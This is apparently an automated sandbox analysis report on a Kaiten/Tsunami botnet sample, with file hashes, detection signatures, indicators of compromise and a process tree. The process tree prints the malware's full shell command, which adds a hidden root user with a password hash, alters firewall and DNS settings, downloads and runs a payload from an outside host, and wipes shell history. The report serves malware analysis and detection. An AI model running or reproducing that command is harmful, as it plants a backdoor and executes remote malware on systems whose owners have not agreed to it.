kaiten | 4e47e795c169cf0cf3b093e98fe7c020117095451f4a899ebdd17077979e07ee

General

Target

3a83ed9b56a4e6abd59a1b7306da751d
Size

62KB
MD5

3a83ed9b56a4e6abd59a1b7306da751d
SHA1

13f5eb7fc4fc278a93d5a143b5e770ae01db52a2
SHA256

4e47e795c169cf0cf3b093e98fe7c020117095451f4a899ebdd17077979e07ee
SHA512

3bdb4ae1aa4de3069725ba8f8b1c9f0aad1141eea83efe01bf1568df492b2bb461ec05d1a7aafa80b4011d66aec3f37770fbcc6207e6de5032fdaa9e6b4bd2d6
SSDEEP

768:8obxF369aOBtJ1I2ySD+Wvhx5f4fwoooagBBdiRN08VTR8QRp8ox0BZAGKOV4fGV:VDK4inxyGz5Qfsoa0Ad8sfQA4eKp+Mdz

Score

10^/10

kaiten botnet

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1540-1-0x0000000000400000-0x000000000052b908-memory.dmp	family_kaiten2

Detects Kaiten/Tsunami payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1540-1-0x0000000000400000-0x000000000052b908-memory.dmp	family_kaiten

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Modifies password files for system users/ groups 4 IoCs

Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.

Processes:

useradd

description	ioc	process
File opened for modification	/etc/shadow	useradd
File opened for modification	/etc/passwd	useradd
File opened for modification	/etc/group	useradd
File opened for modification	/etc/gshadow	useradd

Adds a user to the system 1 IoCs

Processes:

useradd

pid process

1564 useradd
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery
T1016

Processes:

iptables-save

description ioc process

File opened for reading /proc/net/ip_tables_names iptables-save

pid	process
1564	useradd

description	ioc	process
File opened for reading	/proc/net/ip_tables_names	iptables-save

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

Processes:

useraddtar

description	ioc	process
File opened for reading	/proc/filesystems	useradd
File opened for reading	/proc/sys/kernel/ngroups_max	useradd
File opened for reading	/proc/filesystems	tar

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

sh

description ioc process

File opened for modification /tmp/resolv.conf sh

description	ioc	process
File opened for modification	/tmp/resolv.conf	sh

/tmp/3a83ed9b56a4e6abd59a1b7306da751d
/tmp/3a83ed9b56a4e6abd59a1b7306da751d
1⤵
PID:1540
- /bin/sh
  sh -c "IPT=/sbin/iptables;\$IPT -N TN;\$IPT -A TN -s -j ACCEPT;\$IPT -A TN -p tcp -m tcp --dport 23 -j REJECT;\$IPT -I INPUT -j TN;\$IPT-save; echo 'nameserver 4.2.2.2' > /tmp/resolv.conf;echo 'namserver 208.67.222.222' >> /tmp/resolv.conf ;useradd -u 0 -g 0 -o -l -d /root -N -M -p '\$1\$OwJj0Fjv\$RmdaYLph3xpxhxxfPBe8S1' VM >/dev/null 2>&1 ; cd /dev ; wget http://gotmilk.cf/p.tar ; curl -O http://gotmilk.cf/p.tar ; tar -xvf p.tar; cd .a; chmod 777 *; ./a; clear;history -c; clear;history -w "
  2⤵
  - Writes file to tmp directory
  PID:1551
- - /sbin/iptables
    /sbin/iptables -N TN
    3⤵
    PID:1552
- - /sbin/iptables
    /sbin/iptables -A TN -s -j ACCEPT
    3⤵
    PID:1555
- - /sbin/iptables
    /sbin/iptables -A TN -p tcp -m tcp --dport 23 -j REJECT
    3⤵
    PID:1556
- - /sbin/iptables
    /sbin/iptables -I INPUT -j TN
    3⤵
    PID:1562
- - /sbin/iptables-save
    /sbin/iptables-save
    3⤵
    - Reads system network configuration
    PID:1563
- - /usr/sbin/useradd
    useradd -u 0 -g 0 -o -l -d /root -N -M -p "\$1\$OwJj0Fjv\$RmdaYLph3xpxhxxfPBe8S1" VM
    3⤵
    - Modifies password files for system users/ groups
    - Adds a user to the system
    - Reads runtime system information
    PID:1564
  - - /usr/sbin/nscd
      nscd -i passwd
      4⤵
      PID:1568
  - - /usr/sbin/nscd
      nscd -i group
      4⤵
      PID:1569
  - - /usr/sbin/nscd
      nscd -i passwd
      4⤵
      PID:1570
  - - /usr/sbin/nscd
      nscd -i group
      4⤵
      PID:1571
- - /usr/bin/wget
    wget http://gotmilk.cf/p.tar
    3⤵
    PID:1572
- - /bin/tar
    tar -xvf p.tar
    3⤵
    - Reads runtime system information
    PID:1573
- - /bin/chmod
    chmod 777 autofs block bsg btrfs-control bus cdrom char console core cpu cpu_dma_latency cuse disk dri dvd ecryptfs fb0 fd fd0 full fuse hidraw0 hpet hugepages hwrng i2c-0 initctl input kmsg log loop-control loop0 loop1 loop2 loop3 loop4 loop5 loop6 loop7 lp0 mapper mcelog mem memory_bandwidth mqueue net network_latency network_throughput null parport0 port ppp psaux ptmx pts random rfkill rtc rtc0 sg0 shm snapshot snd sr0 stderr stdin stdout tty tty0 tty1 tty10 tty11 tty12 tty13 tty14 tty15 tty16 tty17 tty18 tty19 tty2 tty20 tty21 tty22 tty23 tty24 tty25 tty26 tty27 tty28 tty29 tty3 tty30 tty31 tty32 tty33 tty34 tty35 tty36 tty37 tty38 tty39 tty4 tty40 tty41 tty42 tty43 tty44 tty45 tty46 tty47 tty48 tty49 tty5 tty50 tty51 tty52 tty53 tty54 tty55 tty56 tty57 tty58 tty59 tty6 tty60 tty61 tty62 tty63 tty7 tty8 tty9 ttyS0 ttyS1 ttyS10 ttyS11 ttyS12 ttyS13 ttyS14 ttyS15 ttyS16 ttyS17 ttyS18 ttyS19 ttyS2 ttyS20 ttyS21 ttyS22 ttyS23 ttyS24 ttyS25 ttyS26 ttyS27 ttyS28 ttyS29 ttyS3 ttyS30 ttyS31 ttyS4 ttyS5 ttyS6 ttyS7 ttyS8 ttyS9 ttyprintk uhid uinput urandom userio vcs vcs1 vcs2 vcs3 vcs4 vcs5 vcs6 vcsa vcsa1 vcsa2 vcsa3 vcsa4 vcsa5 vcsa6 vda vda1 vfio vga_arbiter vhci vhost-net vhost-vsock zero
    3⤵
    PID:1574
- - /dev/a
    ./a
    3⤵
    PID:1575
- - /usr/bin/clear
    clear
    3⤵
    PID:1576
- - /usr/bin/clear
    clear
    3⤵
    PID:1577

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/passwd+

Filesize
2KB

MD5
78d62856d83a2eba2c2c6f9c64d4d34a

SHA1
dcc4abd1ea0315e1d94bcbdd976d6ef3316d3268

SHA256
f38aaa444755aa37c43015b5568ea5f7fd22b963242808bac663ce94c5951805

SHA512
7925cfd9e9e8c307e4e8d843b867dc66d4fd4d3b9528e60d5df90459a57342c48285f9782824eb76ee4209bbb9ad1e72ba6024322af51b5de45156efee675aca

Download Submit
/etc/shadow+

Filesize
1KB

MD5
a7ed3bf8eeb9762346d4429591c651bc

SHA1
5a7f845388df5a4dade5f5c6ed5ae212016c889d

SHA256
f2207e50b368b088a8f7e4a864a22d59a08cd1cb445b213357bb87ec305b2096

SHA512
735dbb337c708cd6619106fe692cc29a9f518c3ff8501756f18ace323ad05dad8ae37301c2876697edb01c9db7f7e26ffa7ec62c4b284f5fe0b127f4a41407ec

Download Submit
/etc/subuid+

Filesize
34B

MD5
5c145cd9e9f8233fb450ad3e2c16b962

SHA1
6d85f761f49cdbc6b1badba449ec1c6613cca058

SHA256
c09945c7db200d704c8e8f6dd0402bc82d4ec6aa230f05cffb7e7c9818958950

SHA512
1f9f5f3c04af3f800b23d76d8902afdc49d14105f512007b3ad9aa7b49f786d8f4aefda782d6e512caa90e28ffbea8e31e58eb34744fb04eff6ed568894ddf46

Download Submit
/tmp/resolv.conf

Filesize
19B

MD5
18e0d4be7ee318c312d30ed75f39224a

SHA1
b9dc9465cf5b3df703210bc0a9c3a9cf99a0a9da

SHA256
ccf6e60942eb1621dc5c14f36e531f15ddab87cd011b0330055b638437969038

SHA512
50d8b06a918649fd3d3b9ddb4e9a5488584adc3fd17c32ed897283bdd96d38f77e51e7bf3580e9ec826aba09112cfcf220a6a989cae1f65e0876787fccd7b7f3

Download Submit
/tmp/resolv.conf

Filesize
44B

MD5
51a49244ffd6b878ded13f8ca99ec374

SHA1
e1b011254290e401e3e033691ac003fb5eb4744e

SHA256
b8b3e8e7ef159fac65286258082f832c227e982512ff9457b7d166e91b77ce98

SHA512
202ecd188cb234b6d21e6a4c895fc1420ec445bea436a9cba0986fc82979df6d2f3afca57542e2944f5df9b380d61ede54e6782cd3baee0f07a1df41b59a10c1

Download Submit
memory/1540-1-0x0000000000400000-0x000000000052b908-memory.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads